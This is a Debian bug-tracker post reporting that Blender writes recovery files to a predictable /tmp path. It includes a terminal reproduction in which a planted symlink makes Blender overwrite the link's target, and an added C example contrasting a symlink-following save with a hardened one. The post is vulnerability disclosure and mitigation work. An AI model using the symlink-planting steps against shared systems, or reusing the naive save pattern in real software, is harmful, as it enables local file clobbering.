Bug#584621: blender: possible symlink attack

Paul Wise pabs at debian.org
Wed Sep 5 14:23:58 UTC 2012


Control: reopen -1
Control: found -1 2.63a-1

On Thu, 2012-01-05 at 12:48 +0100, Matteo F. Vescovi wrote:

> Version: 2.61-1
> 
> Closing.
> Feel free to re-open the report if the issue persists.
> 
> Thanks for your time and efforts.

Sorry I didn't notice this bug closing, but did you check that this
problem was fixed? It certainly is not fixed on wheezy (see below).

This bug has occurred and been fixed before (#298167) and it is a bit
disappointing that it was fixed in 2.37a-1 and then again by a different
maintainer and the maintainer after that didn't preserve those fixes.
Security team, can we get a CVE assigned for this? Perhaps that would
get people to fix it for good. The consequences are arbitrary file
creation or overwrite on a multi-user system:

pabs at chianamo ~ $ dpkg -l blender 
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                          Version             Architecture        Description
+++-=============================-===================-===================-===============================================================
ii  blender                       2.63a-1             amd64               Very fast and versatile 3D modeller/renderer
pabs at chianamo ~ $ sudo ln -s /home/pabs/foo /tmp/quit.blend
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: broken symbolic link to `/home/pabs/foo'
/home/pabs/foo:  ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs at chianamo ~ $ blender 

Blender quit
pabs at chianamo ~ $ blender 
Saved session recovery to /tmp/quit.blend

Blender quit
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 170K Sep  5 22:02 /home/pabs/foo
lrwxrwxrwx 1 root root   14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  Blender3D, saved as 64-bits little endian with version 2.63
pabs at chianamo ~ $ echo foo > /home/pabs/foo
pabs at chianamo ~ $ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs  4 Sep  5 22:03 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Sep  5 22:01 /tmp/quit.blend -> /home/pabs/foo
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  ASCII text
pabs at chianamo ~ $ blender 
Saved session recovery to /tmp/quit.blend

Blender quit
pabs at chianamo ~ $ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo:  Blender3D, saved as 64-bits little endian with version 2.63

-- 
bye,
pabs

http://wiki.debian.org/PaulWise
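
The failure mode shown in the transcript above, as an added C example that is not Blender's code and not part of the original message: a naive save follows a planted symlink, while a save opened with O_NOFOLLOW and checked with fstat() refuses it. The function names and the scratch directory are constructed for illustration, and the hardened variant is one common mitigation, not the fix applied in the Debian package.

```c
#define _GNU_SOURCE 1   /* O_NOFOLLOW and mkdtemp under strict -std modes */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive save: fopen() follows a symlink planted at `path`, so the data lands
 * wherever the link points (the behaviour in the transcript above). */
static int save_naive(const char *path, const char *buf, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t n = fwrite(buf, 1, len, f);
    return (fclose(f) == 0 && n == len) ? 0 : -1;
}

/* Hardened save: O_NOFOLLOW makes open() fail (ELOOP) when the final path
 * component is a symlink; fstat() then insists on our own regular file, and
 * truncation happens only after those checks pass. */
static int save_hardened(const char *path, const char *buf, size_t len)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid() ||
        st.st_nlink != 1 || ftruncate(fd, 0) != 0 ||
        write(fd, buf, len) != (ssize_t)len) { close(fd); return -1; }
    return close(fd);
}

/* Constructed scenario: a scratch directory stands in for /tmp. Returns 1 if
 * the link target got written through the link, 0 if not, -1 on setup error. */
static int victim_written(int hardened)
{
    char dir[] = "/tmp/symlink-demo-XXXXXX", link[64], victim[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(link, sizeof link, "%s/quit.blend", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, link) != 0) { rmdir(dir); return -1; }
    if (hardened) (void)save_hardened(link, "BLENDER", 7);
    else (void)save_naive(link, "BLENDER", 7);
    int hit = (access(victim, F_OK) == 0);
    unlink(victim); unlink(link); rmdir(dir);
    return hit;
}

int main(void) { printf("naive=%d hardened=%d\n", victim_written(0), victim_written(1)); return 0; }
```

Keeping per-user recovery files out of a shared, world-writable directory avoids the planted-link problem altogether; the open() flags only harden the last path component.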

More information about the pkg-multimedia-maintainers mailing list